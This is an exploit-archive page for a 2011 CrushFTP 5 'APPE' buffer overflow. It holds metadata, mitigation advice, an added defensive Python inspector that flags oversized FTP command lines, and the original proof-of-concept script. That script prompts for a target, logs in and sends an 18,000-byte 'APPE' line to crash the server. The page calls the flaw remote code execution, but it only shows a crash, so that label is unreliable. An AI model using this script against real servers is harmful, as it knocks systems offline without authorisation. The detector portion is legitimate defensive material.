Vendor: CrushFTP 5
By: BSOD Digital (Fabien DROMAS)
CVSS: 9.3 (HIGH)
Remote Code Execution
CWE: 119
Product Name: CrushFTP 5
Affected Version From: 5.7.0_96
Affected Version To: 5.7.0_96
Patch Exists: YES
Related CWE: N/A
CPE: a:crushftp:crushftp_5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2011

Crush FTP 5 ‘APPE’ command Remote BSOD Poc Exploit

This exploit is a proof of concept for a remote code execution vulnerability in Crush FTP 5. The vulnerability is triggered by sending a specially crafted 'APPE' command with 9000 bytes of data. This causes a buffer overflow which leads to a Blue Screen of Death (BSOD) on the target system.

Mitigation:

Upgrade to the latest version of Crush FTP 5, which is not vulnerable to this exploit.
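
For servers that cannot be upgraded immediately, the oversized 'APPE' line described above can be caught on the FTP control channel by a proxy or network sensor. The following is an added example, not part of the original advisory or of CrushFTP; the 512-byte line limit, the 256-byte filler threshold and all names (FtpLineInspector, inspect_session) are assumptions chosen for illustration.

```python
import re

MAX_LINE = 512   # assumed policy limit for one control-channel line (not from the page)
FILLER_RE = re.compile(rb"(.)\1{255,}", re.DOTALL)  # assumed: 256+ repeats of one byte


class FtpLineInspector:
    """Reassembles client FTP command lines from TCP segments; flags oversized ones."""

    def __init__(self, max_line=MAX_LINE):
        self.max_line = max_line
        self.buf = bytearray()
        self.overflowing = False  # already alerted on the line currently in progress

    def _alert(self, line, complete):
        verb = line.split(b" ", 1)[0][:8].upper().decode("ascii", "replace")
        return {"verb": verb, "seen_bytes": len(line), "complete": complete,
                "filler": FILLER_RE.search(line) is not None}

    def feed(self, segment):
        """Consume one client-to-server segment and return the alerts it raised."""
        alerts = []
        self.buf += segment
        while (nl := self.buf.find(b"\n")) >= 0:
            line = bytes(self.buf[:nl]).rstrip(b"\r")
            del self.buf[:nl + 1]
            if self.overflowing:          # tail of a line that was already reported
                self.overflowing = False
            elif len(line) > self.max_line:
                alerts.append(self._alert(line, complete=True))
        if not self.overflowing and len(self.buf) > self.max_line:
            # Alert before the terminator arrives, so a proxy could drop the session early.
            alerts.append(self._alert(bytes(self.buf), complete=False))
            self.overflowing = True
        if self.overflowing:
            self.buf.clear()              # bound memory while skipping the rest of the line
        return alerts


def inspect_session(segments):
    inspector = FtpLineInspector()
    return [a for seg in segments for a in inspector.feed(seg)]


# Constructed sample: a normal login and upload, then an APPE line shaped like the
# one described on this page, split into 1460-byte segments as TCP would deliver it.
_long = b"APPE " + b"A" * 9000 + b" " * 9000 + b"\r\n"
SAMPLE = [b"USER test\r\n", b"PASS test\r\n", b"APPE upload.txt\r\n"]
SAMPLE += [_long[i:i + 1460] for i in range(0, len(_long), 1460)] + [b"QUIT\r\n"]
```

Because the inspector alerts as soon as the unterminated line passes the limit, the oversized command is reported on its first segment and the remaining segments are discarded without being buffered.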

Exploit-DB raw data:

#
#Exploit Title:
#Crush FTP 5 'APPE' command Remote BSOD Poc Exploit
#
#Date: 06/09/2011
#
#Author: BSOD Digital (Fabien DROMAS)
#Mail: bsoddigital@gmail.com
#
#
#Test:
#OS: Windows 7
#Versions: 5.7.0_96
#
#
#Link:
#https://www.crushftp.com/early5/CrushFTP5_PC.zip
#
#!/usr/bin/env python

import socket

host = raw_input("Type Target IP: ")

data1 = ("A" * 9000)
data2 = (" " * 9000)
cmd = ('APPE')

print ("\n--------------------------------------------------\n")
print ("Crush FTP 5 'APPE' command Remote BSOD Poc Exploit\n")
print ("      BSOD Digital - bsoddigital@gmail.com        \n")
print ("--------------------------------------------------\n")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 21))
r=s.recv(1024)
print (r)
s.send("USER test\r\n")
r=s.recv(1024)
print (r)
s.send("PASS test\r\n")
r=s.recv(1024)
print (r)
s.send(cmd + " " + data1 + data2 + '\r\n')
print ("Payload Send!\n")
print ("2 or 3 seconds before the blue screen of the death...")
s.close()